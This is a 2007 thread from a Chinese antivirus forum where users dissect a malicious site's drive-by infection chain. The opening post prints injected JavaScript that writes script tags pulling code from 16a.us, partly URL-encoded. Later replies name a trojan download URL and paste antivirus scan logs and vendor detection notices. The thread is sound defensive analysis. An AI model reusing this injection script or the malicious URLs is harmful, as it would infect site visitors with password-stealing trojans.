查看: 1922|回复: 7
收起左侧

毒网?

[复制链接]
allenhippo
发表于 2007-5-28 20:46:18 | 显示全部楼层 |阅读模式
  1. www.10gb.cn
复制代码
前面看安全控制中心一哥们说了过卡巴的,无奈补丁太全,抓不了。

原贴:
http://bbs.kafan.cn/viewthread.php?tid=90421&extra=page%3D1

貌似最后被链到这里:
  1. http://ok.nice8.org/add/add_163693.htm
复制代码
里面的addr.js


中间写到
  1. info =  "<script src="http://16a.us/oKK/JsT.js"></script>" +"\n"+
  2.   "<script>" +"\n"+
  3.   "function Get(){" +"\n"+
  4.   "var Then = new Date() " +"\n"+
  5.   "Then.setTime(Then.getTime() + 24*60*60*1000)" +"\n"+
  6.   "var cookieString = new String(document.cookie)" +"\n"+
  7.   "var cookieHeader = "Cookie1=" " +"\n"+
  8.   "var beginPosition = cookieString.indexOf(cookieHeader)" +"\n"+
  9.   "if (beginPosition != -1){ " +"\n"+
  10.   "} else " +"\n"+
  11.   "{ document.cookie = "Cookie1=POPWINDOS;expires="+ Then.toGMTString() " +"\n"+
  12.   "document.write(unescape("%3Cscript%20src%3D%22http%3A%2F%2F16a%2Eus%2FoKK%2FoKK%2Ejs%22%3E%3C%2Fscript%3E"));" +"\n"+
  13.   "}" +"\n"+
  14.   "}" +"\n"+
  15.   "Get();" +"\n"+
  16.   "</script>"
  17. document.write(info)
复制代码
靠,又是16a.us

应该就是这个了
  1. http://16a.us/oKK/JsT.js
复制代码



解不来,高手上吧。难道还是指向那个svchost?太无聊了,靠。




原来不是,不过也是一个人做的


[ 本帖最后由 allenhippo 于 2007-5-28 21:57 编辑 ]

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
mhj144007
发表于 2007-5-28 21:34:14 | 显示全部楼层
扫描结果
第83行:包含跨域的隐藏内联框架






安全鉴定:
危险!此页面可能包含木马。
scottxzt
发表于 2007-5-28 21:46:31 | 显示全部楼层
进去看了不15分钟,没发现啥,倒是有些标题满吸引人的
dikex
发表于 2007-5-28 21:54:41 | 显示全部楼层
挂得有点深入……

jst.js里面有一只http://7y7.us/oKK/smss.exe

okk.js貌似是一个利用N久前的QQ漏洞的东西
The EQs
发表于 2007-5-28 22:00:26 | 显示全部楼层

nod32不报那两个js

Scan performed at: 2007-5-28 22:00:08
Scanning Log
NOD32 version 2293 (20070527) NT
Command line: C:\Documents and Settings\EQ2\桌面\smss.rar C:\Documents and Settings\EQ2\桌面\addr.rar C:\Documents and Settings\EQ2\桌面\JsT.rar C:\Documents and Settings\EQ2\桌面\svchost.rar
Operating memory - is OK

Date: 28.5.2007  Time: 22:00:12
Anti-Stealth technology is enabled.
Scanned disks, folders and files: C:\Documents and Settings\EQ2\桌面\smss.rar; C:\Documents and Settings\EQ2\桌面\addr.rar; C:\Documents and Settings\EQ2\桌面\JsT.rar; C:\Documents and Settings\EQ2\桌面\svchost.rar
C:\Documents and Settings\EQ2\桌面\smss.rar ?RAR ?smss.exe - probably a variant of Win32/PSW.Delf.NHI trojan
C:\Documents and Settings\EQ2\桌面\svchost.rar ?RAR ?svchost.exe - probably a variant of Win32/PSW.Delf.NHI trojan
Number of scanned files: 8
Number of threats found: 2
Number of files cleaned: 2
Time of completion: 22:00:12 Total scanning time: 0 sec (00:00:00)
worker321
头像被屏蔽
发表于 2007-5-28 22:48:32 | 显示全部楼层
小红伞报两个

Begin scan in 'C:\Documents and Settings\Administrator\桌面\smss.rar'
C:\Documents and Settings\Administrator\桌面\smss.rar
  [0] Archive type: RAR
  --> smss.exe
      [DETECTION] Contains signature of the dropper DR/Delphi.Gen
      [WARNING]   The file was ignored!
Begin scan in 'C:\Documents and Settings\Administrator\桌面\addr.rar'
Begin scan in 'C:\Documents and Settings\Administrator\桌面\JsT.rar'
Begin scan in 'C:\Documents and Settings\Administrator\桌面\svchost.rar'
C:\Documents and Settings\Administrator\桌面\svchost.rar
  [0] Archive type: RAR
  --> svchost.exe
      [DETECTION] Contains signature of the dropper DR/Delphi.Gen
      [WARNING]   The file was ignored!


C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\IYWFSNI1\oKK[1].js
      [DETECTION] Contains suspicious code HEUR/Exploit.HTML
      [WARNING]   The file was ignored!
wangjay1980
发表于 2007-5-28 23:29:35 | 显示全部楼层
Hello,

svchost.exe - Virus.Win32.AutoRun.p

New malicious software was found in this file. It's detection will be included in the next update. Thank you for your help.

Please quote all when answering.

--
Best regards, Yaroslav Kirillov
Virus analyst, Kaspersky Lab.
e-mail: newvirus@kaspersky.com
http://www.kaspersky.com/

http://www.kaspersky.com/virusscanner - free online virus scanner.
http://www.kaspersky.com/helpdesk.html - technical support.



> Attachment: svchost.zip
Hello,

smss.exe - Virus.Win32.AutoRun.p

New malicious software was found in this file. It's detection will be included in the next update. Thank you for your help.

Please quote all when answering.

--
Best regards, Yaroslav Kirillov
Virus analyst, Kaspersky Lab.
e-mail: newvirus@kaspersky.com
http://www.kaspersky.com/

http://www.kaspersky.com/virusscanner - free online virus scanner.
http://www.kaspersky.com/helpdesk.html - technical support.



> Attachment: smss.zip
欠妳緈諨
发表于 2007-5-28 23:32:34 | 显示全部楼层
AVAST不杀脚本

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-1-12 16:12 , Processed in 0.122191 second(s), 18 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表